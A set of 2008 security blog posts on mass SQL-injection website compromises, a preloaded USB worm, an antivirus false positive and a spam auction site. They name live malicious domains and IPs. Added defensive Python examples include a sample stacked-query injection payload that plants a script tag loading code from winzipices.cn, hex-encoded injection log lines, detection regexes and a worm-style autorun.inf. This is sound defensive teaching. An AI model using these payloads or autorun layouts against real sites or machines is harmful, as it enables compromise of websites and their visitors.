Friday, 9 May 2008

Rock Group plc / rockdirect.com in administration


UK notebook manufacturer Rock Group plc has gone into administration (roughly the UK equivalent of bankruptcy protection). A well-regarded supplier of high-end notebooks, Rock ran into financial difficulties for a rather unusual reason.

You might expect that a combination of the "credit crunch" and depressed sales due to the unpopularity of Windows Vista might be to blame, but it appears that the root cause of the problem was sales director Paul Bicknell, who stole a staggering £200,000 from the company, which led to serious cashflow problems. Bicknell squandered the money on online gambling sites and fast cars and was subsequently sentenced to three years in prison. More details here and here. Perhaps Bicknell took Rock's "change your life" slogan rather too seriously.

Deloitte & Touche LLP are the administrators; customers and trading partners should read the Rock press release and check the company web site for more details.

It's a shame to see a good company go under in such circumstances, but what is even more bizarre is that an employee's gambling addiction caused the problem.

(Tip: if you like a flutter rather too much and live in the UK, try talking to a counselling service such as GamCare. There are similar services worldwide.)


Wednesday, 7 May 2008

winzipices.cn and bbs.jueduizuan.com - another SQL injection attack

The ISC has warned about another SQL Injection attack, following on from this one a few weeks ago. This time the injection is inserting a script pointing to the winzipices.cn and bbs.jueduizuan.com domains.

The malicious script is pointing to winzipices.cn/1.js, winzipices.cn/2.js, winzipices.cn/3.js, winzipices.cn/4.js and winzipices.cn/5.js and also bbs.jueduizuan.com/ip.js. As ever, don't visit these sites unless you know what you are doing.

At the moment, winzipices.cn is coming up with a server error, but bbs.jueduizuan.com is functioning just fine. Its script tries to attack visiting systems using the MS07-004 vulnerability and a RealPlayer vulnerability, and it also attempts to download an executable from www.bluell.cn/ri.exe, possibly using a shell vulnerability (VirusTotal analysis here; mostly detected as Trojan.Win32.Agent.lpv, Trojan.MulDrop.origin or TR/Dropper.Gen).

Some IP addresses:
www.bluell.cn is 60.191.239.219
winzipices.cn is 60.191.239.229
bbs.jueduizuan.com is 60.191.239.219

My recommendation is to block access to the entire 60.191.239.x range if you can.

At the moment, a Google search for winzipices.cn shows 1,790 matches and one for jueduizuan.com shows 1,640. Expect those figures to climb sharply.

If your site has been hit, the fault is not the database server as such but the web application in front of it: it is building SQL from unvalidated request parameters, and until that is fixed (parameterised queries plus strict input validation) the problem will simply happen again. Client machines that are fully up-to-date on patches should be protected; if you have been infected, use the excellent Secunia Software Inspector to check your system for vulnerable applications.
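To make the "fix the application, not the server" point concrete, here is an added example (mine, not code from the original post or from any affected site). It uses an in-memory SQLite database with constructed sample rows to show the vulnerable string-concatenation pattern beside the parameterised fix, and then a sweep that finds injected `<script>` tags across every table and column, which is the attack's own enumeration run in reverse and a handy post-cleanup check. The injected tag mirrors the one described above; the stacked `UPDATE` is the general shape of these campaigns without their hex-encoding wrapper, and the table name and rows are invented.

```python
import sqlite3

# Constructed sample data and payload (not from the original post).  The injected
# tag mirrors the one the post describes; the stacked UPDATE is the general shape
# of the 2008 mass-injection campaigns, minus their hex-encoding wrapper.
INJECTED_TAG = "<script src=http://winzipices.cn/1.js></script>"
PAYLOAD = f"1; UPDATE articles SET body = body || '{INJECTED_TAG}'"


def make_db():
    """In-memory stand-in for a site's content database (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO articles VALUES (1, 'Welcome', '<p>Hello</p>');
        INSERT INTO articles VALUES (2, 'News', '<p>Latest</p>');
        """
    )
    return conn


def fetch_article_vulnerable(conn, article_id):
    """The flaw: the request parameter is pasted straight into the SQL text.
    executescript() runs stacked statements, as MS SQL Server does by default,
    so the attacker's UPDATE rides along behind the legitimate SELECT."""
    sql = f"SELECT title, body FROM articles WHERE id = {article_id}"
    conn.executescript(sql)  # results discarded; the damage is the side effect


def fetch_article_safe(conn, article_id):
    """The fix: validate the type, then bind the value as a parameter so the
    driver never treats it as SQL.  Returns None for input that is not an id."""
    try:
        ident = int(article_id)
    except (TypeError, ValueError):
        return None
    return conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (ident,)
    ).fetchall()


def find_injected_script(conn):
    """Sweep every column of every table for injected <script> tags.  Table and
    column names come from the catalogue, not from users, which is why quoting
    them into the SQL here is acceptable."""
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        columns = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')]
        for col in columns:
            rows = conn.execute(
                f'SELECT rowid FROM "{table}" WHERE "{col}" LIKE ?',
                ("%<script%",),
            ).fetchall()
            hits.extend((table, col, r[0]) for r in rows)
    return sorted(hits)


if __name__ == "__main__":
    db = make_db()
    fetch_article_vulnerable(db, PAYLOAD)
    print("after vulnerable handler:", find_injected_script(db))
    db = make_db()
    print("safe handler on payload:", fetch_article_safe(db, PAYLOAD))
    print("safe handler on real id:", fetch_article_safe(db, "1"))
```

The point of the sweep is that these attacks do not target one page: they walk the system catalogue and append the tag to every text column they can find, so cleanup has to be just as thorough, and the same sweep run a day later tells you whether the hole was actually closed.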

As always, some high-profile sites have been compromised. They may well have been cleaned up by now, so inclusion here says nothing about whether they are currently safe or unsafe to visit.

bbs.jueduizuan.com
  • safecanada.ca (Canadian Homeland Security again).
  • breastcanceradvice.com, arthritisissues.com, menssexhealth.com, www.bipolardepressioninfo.com (Health)
  • dubaicityguide.com (Travel)
  • classicdriver.com (Motoring)
winzipices.cn
  • imo.org (International Maritime Organisation)
  • cifas.org.uk (Fraud Prevention)
  • hmdb.org (Historical Marker Database)
  • abbyy.com (OCR software)
  • cancerissues.com, adhdissues.com, depressionissues.com, diabeticdiets.org, erectilefacts.com, prostatecancerissues.com, digestivefacts.com (Health)
  • www.asiamedia.ucla.edu, www.international.ucla.edu, www.asiaarts.ucla.edu, www.isop.ucla.edu (UCLA)
  • newmarket.travel (Travel)
  • discoverireland.ie (Travel)
  • gay.tv (Lifestyle)
Some of these sites are regularly hit by SQL injection attacks, and safecanada.ca was also infected in the last major outbreak. The problem is that once a site has been attacked and its vulnerable pages enumerated, it will be attacked again and again until it is fixed.

As mentioned before, there is no such thing as a safe site.


Wednesday, 23 April 2008

nihaorr1.com - there's no such thing as a "safe" site

Websense gave a heads-up about yet another mass compromise, impacting a number of high-profile web sites. Just to make life difficult, they didn't specify the domain in use.. but it isn't exactly rocket science to find out that it is nihaorr1.com.

I'm going to make an assumption that if you're reading this blog, you're at least somewhat technically savvy. Don't visit any of these sites unless you know what you are doing.

Googling nihaorr1.com/1.js brings up several thousand matches. Surprisingly, an examination of www.nihaorr1.com/1.js shows that it is not obfuscated at all and simply points to www.nihaorr1.com/1.htm.. and that has all the exploits nicely laid out: MS07-055, MS07-033, MS07-018, MS07-004 and MS06-014. There are also exploits for RealPlayer, Ajax, QQ Instant Messenger and some sort of Yahoo! product (probably Instant Messenger).


If your site has been compromised and you're looking for answers.. well, all I can tell you is that it will have been done through some sort of SQL Injection similar to this one.

If you're supporting client PCs that are fully patched, you have a little less to worry about unless you have RealPlayer or Yahoo! IM installed. Perhaps it is a good time to consider banning these applications in any case, particularly RealPlayer, which is a very common vector for attack.

Why do I say there's no such thing as a "safe" site? Well, among the compromised sites are the following:

www.redmondmag.com [Independent publication about Microsoft]
www.pocketpcmag.com [Smartphone & Pocket PC magazine]
www.careers.civil-service.gov.uk [UK Civil Service]
www.faststream.gov.uk [UK Civil Service]
www.safecanada.ca [Canadian National Security]
www.n-somerset.gov.uk [UK Local Government]
events.un.org [United Nations]
www.unicef.org.uk [UNICEF]
www.iphe.org.uk [Institute of Plumbing and Heating Engineering]
www.umc.org [United Methodist Church]
www.umita.org [United Methodist Information Technology Association]
www.simplyislam.co.uk [Islamic Information site]
www.rsa.org.uk [Royal Society for the Encouragement of Arts]
www.24.com [Sports]
www.oddbins.co.uk [Major UK wine retailer]
www.avx.com [Electronic components]
www.advantech.com [Computer components]
www.aeroflot.aero [Airline]
www.aeroflot.ru [Airline]

In other words, you can't rely on the site you are visiting to be safe.. so the onus is on the end user to make sure their PC is fully patched and as secure as possible.


Tuesday, 22 April 2008

Win32/Loodok!generic.2 in SYSTEM.DLL - likely false positive

We're getting a plague of these with eTrust (pattern 5723):

[time 22/04/2008 12:54:21: ID 14: machine xxxxx.com: response 22/04/2008 12:54:46] The Win32/Loodok!generic.2 was detected in C:\DOCUME~1\XXXXX\LOCALS~1\TEMP...\SYSTEM.DLL. Machine: XXXXX, User: XXXXX\xxxxx. Status: File was cured; system cure performed.

The subdirectory varies, but it is usually %USERPROFILE%\Local Settings\Temp\ns???.tmp, where the question marks stand for random letters or numbers. You may find that the subdirectory has vanished by the time you investigate.

This appears to be happening with the installer for Firefox (also tested with Netscape Navigator). You can see the problem if you pause the AV scanner, fire up the Firefox installer and leave it running.. the SYSTEM.DLL is clearly there. The pattern, a random ns???.tmp folder under %TEMP% containing System.dll, is what an NSIS (Nullsoft Scriptable Install System) installer produces when it unpacks its plugins at runtime; Firefox's Windows installer is NSIS-based, as are a great many other applications' installers.

Apart from eTrust, VirusTotal gives it a clean bill of health.

You may be seeing this fire off by itself if a software package is autoupdating. Because the same System.dll plugin ships with every NSIS-built installer, not just Firefox's, expect a storm of these.

As usual with false positives, expect a fix to be issued by CA very soon. The problem seems to be with pattern 5723, so updating to a later virus signature should cure it.

Added: Pattern 5724 also reports a positive, but the beta version of 5725 does not. You can download beta signatures from CA here.

Added: 5725 is now available for download as normal, this should cure the problem!


Thursday, 17 April 2008

RavMon.exe virus on new Toshiba Satellite laptop from Comet, Part II

A few weeks ago I wrote about a new laptop, bought from Comet, that came with a virus preloaded. As far as I knew, I was the only person to have this problem, but after carefully checking everything that I had done to set up the machine, my conclusion was that the RAVMON.EXE malware was preloaded on the PC.. but perhaps it was a one-off.

Not so. From the comments on the post, it seems that Toshiba laptops from Currys and PC World have the problem too, and over at the Irreverence Is Justified blog it turns out that exactly the same thing has happened: same virus, same model of Toshiba, and Comet (again).

Detections varied, but it appears to be a trojan that most likely copies itself onto machines via an infected USB key. The implication is that some part of the manufacturing or preparation process has been compromised by infected USB devices.

So Toshiba's manufacturing process is compromised? Well, it appears to be.. but almost certainly an accident rather than a malicious act. Presumably there are many more L40-18Z laptops with the same problem..
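If you are unpacking one of these laptops, or handling the USB keys used on a production line, the practical check is to look at what the drive root would run on insertion. The following is an added example of mine, not code from the original post. It assumes the usual USB-worm mechanism, an autorun.inf in the drive root whose open=, shellexecute= or shell\<verb>\command= keys launch an executable sitting beside it; the post does not say how RavMon.exe got onto the machine, so that mechanism is an assumption here. The autorun.inf content, the RavMon.exe placeholder file and the directory layout are all constructed for the example.

```python
import os
import tempfile

# Constructed autorun.inf in the style of USB-borne worms (not taken from the
# infected laptop; the post names RavMon.exe but not the file that launched it).
# Junk lines and mixed case are typical and the parser must tolerate them.
SAMPLE_AUTORUN = """\
}&^%$junk
[AutoRun]
open=RavMon.exe
shell\\open\\Command=RavMon.exe
shell\\explore\\Command=RavMon.exe
shellexecute=RavMon.exe
icon=%SystemRoot%\\system32\\shell32.dll,4
action=Open folder to view files
"""

LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text):
    """Minimal, tolerant autorun.inf parser: keys are case-insensitive, junk
    lines are skipped, and only the [autorun] section is kept."""
    section = None
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        entries[key.strip().lower()] = value.strip()
    return entries


def launch_targets(entries):
    """Every key that makes Windows run something when the drive is inserted or
    double-clicked: open=, shellexecute= and any shell\\<verb>\\command=."""
    return [
        (key, value)
        for key, value in entries.items()
        if key in LAUNCH_KEYS
        or (key.startswith("shell\\") and key.endswith("\\command"))
    ]


def assess_root(root):
    """Inspect a drive root.  Returns None if there is no autorun.inf, otherwise
    one record per launch command saying whether the referenced file is present
    on the drive (an executable sitting next to an autorun.inf that points at it
    is the classic USB-worm layout)."""
    inf = os.path.join(root, "autorun.inf")
    if not os.path.isfile(inf):
        return None
    with open(inf, "r", errors="replace") as fh:
        entries = parse_autorun(fh.read())
    report = []
    for key, command in launch_targets(entries):
        exe = command.split()[0] if command.split() else command
        report.append({
            "key": key,
            "command": command,
            "present": os.path.isfile(os.path.join(root, exe)),
        })
    return report


def build_sample_drive(root):
    """Lay out the constructed autorun.inf and a placeholder RavMon.exe."""
    with open(os.path.join(root, "autorun.inf"), "w") as fh:
        fh.write(SAMPLE_AUTORUN)
    with open(os.path.join(root, "RavMon.exe"), "wb") as fh:
        fh.write(b"MZ")  # placeholder bytes, not a real binary
    return root


def demo_report():
    """Run the check against the constructed layout and against an empty dir."""
    with tempfile.TemporaryDirectory() as tmp:
        infected = assess_root(build_sample_drive(tmp))
    with tempfile.TemporaryDirectory() as tmp:
        clean = assess_root(tmp)
    return infected, clean


if __name__ == "__main__":
    infected, clean = demo_report()
    for entry in infected:
        print(entry)
    print("empty drive:", clean)
```

Run it against the root of a mounted key (assess_root("E:\\") on Windows, or the mount point on Linux) rather than the temporary directory the demo builds. The check is deliberately independent of AV signatures: a fresh sample that no scanner detects yet still has to announce itself through autorun.inf to spread this way.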


Wednesday, 16 April 2008

2117966.net revisited

Last month I blogged about Trend Micro's website being compromised, along with thousands of others, with an IFRAME injection pointing to 2117966.net.

The ISC has followed up with an analysis of the tool used to compromise the sites. It uses an SQL injection attack to infect the server, but the interesting thing is that it uses Google to enumerate vulnerable sites first, a technique known as Google hacking.
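Because the tool finds its targets through search engines and then fires the same injection at each one, the attempt leaves a recognisable trace in the web server log whether or not it succeeds. The example below is mine, not code from the original post or from the ISC analysis. It scans constructed common-log-format lines for stacked-query injection and decodes the hex-encoded payload form these campaigns used (a DECLARE/SET @S=CAST(0x... AS NVARCHAR)/EXEC(@S) chain, hex-encoded so that naive keyword filters miss the UPDATE) so that the injected script URL, the thing you need to block and grep your database for, falls straight out. The log lines, client addresses, page names and the decoded UPDATE statement are all constructed; only the payload shape is the real one.

```python
import re
from urllib.parse import unquote

# Constructed log lines (not from the original post or the ISC analysis).  The
# payload shape is the one these campaigns used; the hex body is generated here
# from a made-up UPDATE statement so the decoding can be checked end to end.
INJECTED_SQL = (
    "UPDATE news SET body=body+'<script src=http://2117966.net/x.js></script>'"
)
HEX_BODY = INJECTED_SQL.encode("utf-16-le").hex().upper()

LOG_LINES = [
    '203.0.113.5 - - [16/Apr/2008:10:21:07 +0000] "GET /news.asp?id=3;DECLARE%20@S%20'
    'NVARCHAR(4000);SET%20@S=CAST(0x' + HEX_BODY + '%20AS%20NVARCHAR(4000));EXEC(@S);-- '
    'HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Apr/2008:10:21:09 +0000] "GET /news.asp?id=3 HTTP/1.1" 200 5120',
    '198.51.100.8 - - [16/Apr/2008:10:22:41 +0000] "GET /search.asp?q=decl%20are HTTP/1.1" 200 812',
]

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')
# A second statement following the legitimate one is the tell-tale of stacked queries.
STACKED_RE = re.compile(r";\s*(?:DECLARE|SET|EXEC|UPDATE|INSERT|DROP)\b", re.I)
CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)", re.I)
SRC_RE = re.compile(r"""src=["']?([^\s"'>]+)""", re.I)


def decode_cast_payload(hex_body, sql_type):
    """NVARCHAR literals are UTF-16LE; VARCHAR ones are single-byte."""
    raw = bytes.fromhex(hex_body)
    if sql_type.upper() == "NVARCHAR":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def scan_log(lines):
    """One finding per request carrying a stacked-query injection, with any
    hex-encoded payload decoded so the analyst can read what it tried to do."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = unquote(m.group(1))  # undo %20 etc. before pattern matching
        if not STACKED_RE.search(url):
            continue
        decoded = [decode_cast_payload(h, t) for h, t in CAST_RE.findall(url)]
        findings.append({"client": line.split()[0], "url": url, "decoded": decoded})
    return findings


def injected_urls(findings):
    """Pull the script/iframe sources out of decoded payloads: these are the
    hosts to block at the perimeter and to search for in the database."""
    urls = set()
    for finding in findings:
        for sql in finding["decoded"]:
            urls.update(SRC_RE.findall(sql))
    return sorted(urls)


if __name__ == "__main__":
    found = scan_log(LOG_LINES)
    for finding in found:
        print(finding["client"], "->", finding["decoded"])
    print("block:", injected_urls(found))
```

A 200 status on the injected request, as in the first constructed line, is exactly what you would see on a vulnerable ASP page: the SELECT still returns the article, so the page renders normally while the UPDATE behind it does the damage. That is why these attacks went unnoticed on so many sites until the injected tags started serving exploits to visitors.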

I guess there are a few things to note here: despite the ubiquity of SQL, it can still be tricky to set up securely and is best left to people who know what they are doing. Keep your patches up-to-date, and consider carefully whether you want Google (or any other search engine) to index your WHOLE site; adjust your robots.txt if necessary. Bear in mind, though, that robots.txt only asks well-behaved crawlers to stay away and does nothing about the injection flaw itself, so it buys a little obscurity at most.

The ISC article also links to some good resources if you want to properly secure your database.


Thursday, 10 April 2008

ezBay.me.uk - or how NOT to start an online business

Sometimes, people make mistakes with their online marketing. Newbies can accidentally buy a "millions of email addresses CD" with a load of scraped email addresses and spam away. Sometimes they are not aware of trademark laws. But sometimes they are just plain stupid in so many ways that there is no excuse for not ripping into them.

Mistake One - Trademark Violation
In this case, the budding entrepreneur has gone for the name ezBay.me.uk, confusingly similar to the well-known auction company eBay. Sure, there are other users of the "ezbay" name, but the closeness of the name and even the camel-case capitalisation are asking for trouble, possibly some years down the line.. but trouble nonetheless.

Mistake Two - Choose a stupid domain name.
Not only does "ezbay.me.uk" possibly violate trademarks, but it uses the ".me.uk" namespace, which is intended for personal use only. That could well lead to the name being revoked by the registry. Worse, the name doesn't make sense in British English - "Ee Zed Bay"? In American English it's "Easy Bay", which *does* make sense.. but not in conjunction with a .me.uk domain name.

Mistake Three - Spam
There's no excuse for sending out unsolicited bulk email to scraped email addresses, but ezBay.me.uk have done exactly that. That tends to lead to a very short life expectancy for the new auction site you have just created.


EZBAY
24/7 online Auction Site

This is our new 24/7 on line auction please feel free to take a look if you like what you find please register and we will give you £20.00 sellers fee completely free there is no listing fee for items that you may want to sell so what are you waiting for sign up today for your £20.00 and start selling at www.ezbay.me.uk feel free to take a look around at all the bargains
we have many less than 50% cheaper than the high street price so come on see
how easy it is with ezbay happy shopping

BRAND NEW AUCTION

Car DVD player starting bid 50p buy now price £139.00

MP4 player with 1.3m pixels digital camera 2.5in TFT screen starting bid 50p buy now price £32.90

12mp digital video camera with MP3/MP4 starting bid 50p buy now price £76.00

1.1 inch screen clip MP3 player starting bid 50p buy now price £8.50

12.1-inch with 4:3 display roof mount TFT-LCD monitor Starting bid 50p buy now price £62.50

MP3 player sunglasses with FM super-plastic frame and built-in 1 GB flash
memory starting bid 50p buy now price

best regards

mr a m dick
ezbay world

Mistake Four - Be offensive
Signing off an email with a name of "Mr A M Dick" is always likely to annoy people (unless that is the person's name in which case.. oh dear).

Mistake Five - Read Receipts
Not only is this spam, but it was also sent out with a read receipt, a clumsy way of confirming the recipient's email address. Not only will the muppet sending out the spam be overwhelmed with receipts, but many people regard them as an invasion of privacy.


The forensics..
The headers indicate that the mail comes from 75.125.202.82, which is also the IP address of www.ezbay.me.uk, so that's pretty much a smoking gun.

The domain name is registered to:

Domain name:
    ezbay.me.uk

Registrant:
    Ezbay

Registrant type:
    UK Individual

Registrant's address:
    8 Calle Las Encines
    Fuenta De Piedra
    Malaga
    295 30
    ES

Last time I checked, Malaga wasn't in the UK. This address is connected with an Alibaba operation called Murrays Discount.

There's no evidence that this is a scam, but it is almost a textbook example of how to kill a business before it starts. It is notable that despite the spam run, the only person actually selling is "Murray" himself.
